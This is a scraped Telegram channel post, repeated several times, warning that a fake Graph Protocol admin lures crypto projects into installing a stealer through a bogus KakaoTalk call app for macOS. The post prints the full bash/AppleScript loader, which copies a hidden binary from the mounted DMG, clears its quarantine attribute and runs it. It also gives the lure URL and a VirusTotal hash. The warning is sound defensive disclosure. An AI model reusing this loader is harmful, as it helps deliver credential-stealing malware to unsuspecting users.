Another distribution campaign.
@evabeylin (#5817609036) (stated as moderator/admin of the Graph Protocol chat group), is looking out for projects that need investment.
She enters dialog, communicates, invites for a call using the link http://kakao.us.com/?join=4AT3IL (now the link leads to https://jprs.co.jp/en/).
You can download an app for the call on the page.
For OSX it is a DMG file with a size of 742KB.
Inside will be a shell script that you are asked to drag and drop into terminal.
It will cause the stealer to be installed.
Loader is:
Stealer on virustotal: https://www.virustotal.com/gui/file/76702b651e19ab338d0a877e84fcec950c022f5c892e77f9c6e7dbd45a6fae0e
They also targeted Linux and Windows.
Stranger, be careful, having a contact in admin status in some groups does not guarantee security.
Up: graph protocol just removed mention about @evabeylin from posts
@evabeylin (#5817609036) (stated as moderator/admin of the Graph Protocol chat group), is looking out for projects that need investment.
She enters dialog, communicates, invites for a call using the link http://kakao.us.com/?join=4AT3IL (now the link leads to https://jprs.co.jp/en/).
You can download an app for the call on the page.
For OSX it is a DMG file with a size of 742KB.
Inside will be a shell script that you are asked to drag and drop into terminal.
It will cause the stealer to be installed.
Loader is:
#!/bin/bash
osascript -e 'on run
try
set diskList to list disks
end try
set targetDisk to ""
try
repeat with disk in diskList
if disk contains "KakaoTalk" then
set targetDisk to disk
exit repeat
end if
end repeat
end try
if targetDisk is "" then
return
end if
set folderPath to "/Volumes/" & targetDisk & "/"
set appName to ".KakaoTalk"
set appPath to folderPath & appName
set tempAppPath to "/tmp/" & appName
try
do shell script "rm -f " & quoted form of tempAppPath
end try
try
do shell script "cp " & quoted form of appPath & " " & quoted form of tempAppPath
end try
try
do shell script "xattr -c " & quoted form of tempAppPath
end try
try
do shell script "chmod +x " & quoted form of tempAppPath
end try
try
do shell script quoted form of tempAppPath
end try
end run'
Stealer on virustotal: https://www.virustotal.com/gui/file/76702b651e19ab338d0a877e84fcec950c022f5c892e77f9c6e7dbd45a6fae0e
They also targeted Linux and Windows.
Stranger, be careful, having a contact in admin status in some groups does not guarantee security.
Up: graph protocol just removed mention about @evabeylin from posts
tgoop.com/openvpn/812
Create:
Last Update:
Last Update:
Another distribution campaign.
@evabeylin (#5817609036) (stated as moderator/admin of the Graph Protocol chat group), is looking out for projects that need investment.
She enters dialog, communicates, invites for a call using the link http://kakao.us.com/?join=4AT3IL (now the link leads to https://jprs.co.jp/en/).
You can download an app for the call on the page.
For OSX it is a DMG file with a size of 742KB.
Inside will be a shell script that you are asked to drag and drop into terminal.
It will cause the stealer to be installed.
Loader is:
Stealer on virustotal: https://www.virustotal.com/gui/file/76702b651e19ab338d0a877e84fcec950c022f5c892e77f9c6e7dbd45a6fae0e
They also targeted Linux and Windows.
Stranger, be careful, having a contact in admin status in some groups does not guarantee security.
Up: graph protocol just removed mention about @evabeylin from posts
@evabeylin (#5817609036) (stated as moderator/admin of the Graph Protocol chat group), is looking out for projects that need investment.
She enters dialog, communicates, invites for a call using the link http://kakao.us.com/?join=4AT3IL (now the link leads to https://jprs.co.jp/en/).
You can download an app for the call on the page.
For OSX it is a DMG file with a size of 742KB.
Inside will be a shell script that you are asked to drag and drop into terminal.
It will cause the stealer to be installed.
Loader is:
#!/bin/bash
osascript -e 'on run
try
set diskList to list disks
end try
set targetDisk to ""
try
repeat with disk in diskList
if disk contains "KakaoTalk" then
set targetDisk to disk
exit repeat
end if
end repeat
end try
if targetDisk is "" then
return
end if
set folderPath to "/Volumes/" & targetDisk & "/"
set appName to ".KakaoTalk"
set appPath to folderPath & appName
set tempAppPath to "/tmp/" & appName
try
do shell script "rm -f " & quoted form of tempAppPath
end try
try
do shell script "cp " & quoted form of appPath & " " & quoted form of tempAppPath
end try
try
do shell script "xattr -c " & quoted form of tempAppPath
end try
try
do shell script "chmod +x " & quoted form of tempAppPath
end try
try
do shell script quoted form of tempAppPath
end try
end run'
Stealer on virustotal: https://www.virustotal.com/gui/file/76702b651e19ab338d0a877e84fcec950c022f5c892e77f9c6e7dbd45a6fae0e
They also targeted Linux and Windows.
Stranger, be careful, having a contact in admin status in some groups does not guarantee security.
Up: graph protocol just removed mention about @evabeylin from posts
BY Adventures in Dystopia
Share with your friend now:
tgoop.com/openvpn/812